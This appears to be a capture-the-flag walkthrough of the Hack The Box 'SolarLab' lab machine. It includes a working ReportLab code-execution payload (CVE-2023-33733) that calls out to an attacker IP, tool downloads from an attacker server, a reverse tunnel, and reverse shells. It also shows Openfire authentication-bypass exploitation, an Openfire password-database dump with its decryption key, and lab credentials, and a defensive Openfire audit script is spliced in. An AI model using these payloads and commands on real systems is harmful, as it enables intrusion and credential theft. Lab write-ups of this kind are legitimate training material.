SolarLab (Windows · Medium)

CVE-2023-33733 + CVE-2023-32315

Enumeration

Add a hosts entry

10.10.11.16	solarLab.htb

nmap

nmap -A -p- -v -T4 solarlab.htb

Nmap scan report for solarlab.htb (10.10.11.16)
Host is up (0.28s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: SolarLab Instant Messenger
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
6791/tcp open http nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: Did not follow redirect to http://report.solarlab.htb:6791/
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-07-23T04:44:44
|_ start_date: N/A
|_clock-skew: -8m12s

Port 80 serves normally; port 6791 redirects to report.solarlab.htb:6791, so add that name to hosts as well.

445 SMB


details-file.xlsx


gobuster

gobuster dns -d solarlab.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 100
Nothing

dirsearch

dirsearch -u http://solarlab.htb/
Nothing
dirsearch -u http://report.solarlab.htb:6791/
Nothing

solarlab.htb


report.solarlab.htb:6791


Password spraying with the data from the xlsx obtained via SMB

Nothing hit; according to writeups online the credential is BlakeB:ThisCanB3typedeasily1@ (username abbreviated).

Shell


There are four functions, all of which generate a PDF, so search for related vulnerabilities.

<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('curl http://10.10.16.30') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
exploit
</font></para>

Test


Reverse shell; the PowerShell payload was generated with a tool.


User flag: C:\Users\blake\Desktop\user.txt

blakeb:ThisCanB3typedeasily1@
alexanderk:HotP!fireguard
claudias:007poiuytrewq

openfire found under C:\Users


Lateral movement


Upload chisel.exe

# kali
python3 -m http.server

# target
Invoke-WebRequest -Uri "http://10.10.16.30/chisel.exe" -OutFile "C:\Users\blake\Documents\chisel.exe"


chisel

Reverse proxy

./chisel server -p 12345 --reverse --socks5					# kali
./chisel.exe client 10.10.16.30:12345 R:9090:127.0.0.1:9090 # target


google search


Found an authentication bypass; exploit it.


Continue exploiting the CVE


Switching to system command gives RCE.


Reverse shell, generated with a tool

powershell -e <base64-encoded payload>

nc -lvnp 4444


Privilege escalation

embedded-db: when there is a database, look at it first: C:\Program Files\Openfire\embedded-db\openfire.script

From the OFUSER table structure there is both a plaintext password column and an encrypted password column.

CREATE MEMORY TABLE PUBLIC.OFUSER(USERNAME VARCHAR(64) NOT NULL,STOREDKEY VARCHAR(32),SERVERKEY VARCHAR(32),SALT VARCHAR(32),ITERATIONS INTEGER,PLAINPASSWORD VARCHAR(32),ENCRYPTEDPASSWORD VARCHAR(255),NAME VARCHAR(100),EMAIL VARCHAR(100),CREATIONDATE VARCHAR(15) NOT NULL,MODIFICATIONDATE VARCHAR(15) NOT NULL,CONSTRAINT OFUSER_PK PRIMARY KEY(USERNAME))

admin

INSERT INTO OFUSER VALUES('admin','gjMoswpK+HakPdvLIvp6eLKlYh0=','9MwNQcJ9bF4YeyZDdns5gvXp620=','yidQk5Skw11QJWTBAloAb28lYHftqa0x',4096,NULL,'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442','Administrator','admin@solarlab.htb','001700223740785','0')

Google search for a decryption script


A key is also needed

INSERT INTO OFPROPERTY VALUES('passwordKey','hGXiFzsKaAeYLjn',0,NULL)
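A defender-side check, added here and not part of the original writeup: it parses the INSERT rows of an openfire.script dump like the ones above and flags accounts whose password is stored in PLAINPASSWORD, or whose ENCRYPTEDPASSWORD sits in the same file as the passwordKey needed to decrypt it. The sample rows are the admin and passwordKey lines from this box plus a constructed 'tester' user; the column order follows the CREATE TABLE statement shown earlier.

```python
import re

# Column order from the CREATE MEMORY TABLE PUBLIC.OFUSER statement in the dump.
OFUSER_COLUMNS = ["USERNAME", "STOREDKEY", "SERVERKEY", "SALT", "ITERATIONS",
                  "PLAINPASSWORD", "ENCRYPTEDPASSWORD", "NAME", "EMAIL",
                  "CREATIONDATE", "MODIFICATIONDATE"]
_INSERT_RE = re.compile(r"^INSERT INTO (\w+) VALUES\((.*)\)$")
_VALUE_RE = re.compile(r"'((?:[^']|'')*)'|NULL|-?\d+")

def parse_values(body):
    """Tokenise an HSQLDB VALUES(...) body: 'quoted' strings ('' escapes a quote), NULL, integers."""
    out = []
    for m in _VALUE_RE.finditer(body):
        if m.group(1) is not None:
            out.append(m.group(1).replace("''", "'"))
        elif m.group(0) == "NULL":
            out.append(None)
        else:
            out.append(int(m.group(0)))
    return out

def audit_openfire_script(script):
    """Flag users with a clear-text password or a ciphertext whose key is in the same dump."""
    users, key_present = [], False
    for line in script.splitlines():
        m = _INSERT_RE.match(line.strip())
        if not m:
            continue
        table, vals = m.group(1), parse_values(m.group(2))
        if table == "OFUSER":
            users.append(dict(zip(OFUSER_COLUMNS, vals)))
        elif table == "OFPROPERTY" and vals[0] == "passwordKey":
            key_present = True  # Blowfish key stored beside the ciphertexts it protects
    findings = []
    for u in users:
        if u["PLAINPASSWORD"] is not None:
            findings.append(f"{u['USERNAME']}: PLAINPASSWORD stored in clear")
        if u["ENCRYPTEDPASSWORD"] is not None and key_present:
            findings.append(f"{u['USERNAME']}: ENCRYPTEDPASSWORD recoverable, passwordKey is in the same dump")
    return findings

# Constructed sample: the admin and passwordKey rows from the dump plus a made-up 'tester' user.
SAMPLE_SCRIPT = """INSERT INTO OFUSER VALUES('admin','gjMoswpK+HakPdvLIvp6eLKlYh0=','9MwNQcJ9bF4YeyZDdns5gvXp620=','yidQk5Skw11QJWTBAloAb28lYHftqa0x',4096,NULL,'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442','Administrator','admin@solarlab.htb','001700223740785','0')
INSERT INTO OFUSER VALUES('tester',NULL,NULL,NULL,0,'it''s-plain',NULL,'Test User','tester@solarlab.htb','0','0')
INSERT INTO OFPROPERTY VALUES('passwordKey','hGXiFzsKaAeYLjn',0,NULL)"""

if __name__ == "__main__":
    for finding in audit_openfire_script(SAMPLE_SCRIPT):
        print(finding)
```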


impacket-smbexec

Connect; cd cannot be used

impacket-smbexec administrator:'ThisPasswordShouldDo!@'@solarlab.htb
# [-] You can't CD under SMBEXEC. Use full paths.
type C:\Users\Administrator\Desktop\root.txt

evil-winrm

Cannot connect

evil-winrm -i 10.10.11.16 -u administrator -p 'ThisPasswordShouldDo'

RunasCS

Transfer it to the target via PowerShell

Invoke-WebRequest -Uri http://10.10.16.30/RunasCs.exe -OutFile C:\Users\blake\Documents\RunasCs.exe

./RunasCs.exe administrator ThisPasswordShouldDo!@ powershell -r 10.10.16.30:6666
